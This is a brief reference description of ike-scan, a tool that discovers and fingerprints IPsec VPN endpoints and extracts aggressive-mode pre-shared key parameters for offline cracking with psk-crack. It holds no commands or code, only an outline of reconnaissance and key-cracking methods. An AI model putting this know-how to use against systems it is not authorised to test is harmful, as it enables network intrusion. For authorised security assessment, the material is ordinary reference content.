ike-scan

ike-scan discovers IKE hosts and can also fingerprint them using the retransmission backoff pattern. It performs discovery by identifying hosts that respond to IKE requests and fingerprinting by analyzing response packet timing against known patterns.

The tool supports scanning IP addresses, hostnames, networks (192.168.1.0/24), and IP ranges. It works with both IKEv1 (Main and Aggressive modes) and experimental IKEv2 support. Additional features include PSK cracking support via psk-crack companion tool and various protocol manipulation options for testing VPN server responses.

Common use cases include network reconnaissance to identify IPsec VPN endpoints, vendor fingerprinting of IKE implementations, and aggressive mode PSK vulnerability assessment.

ike-scan sends IKE request packets (UDP port 500 by default) to target hosts and analyzes responses for discovery. Fingerprinting uses UDP backoff pattern analysis - recording retransmission timeout intervals and matching against known vendor patterns in /usr/share/ike-scan/ike-backoff-patterns. Aggressive mode PSK cracking extracts parameters for offline dictionary/brute-force cracking with psk-crack using RFC 2409 SKEYID computation (MD5/SHA1) or Nortel proprietary method.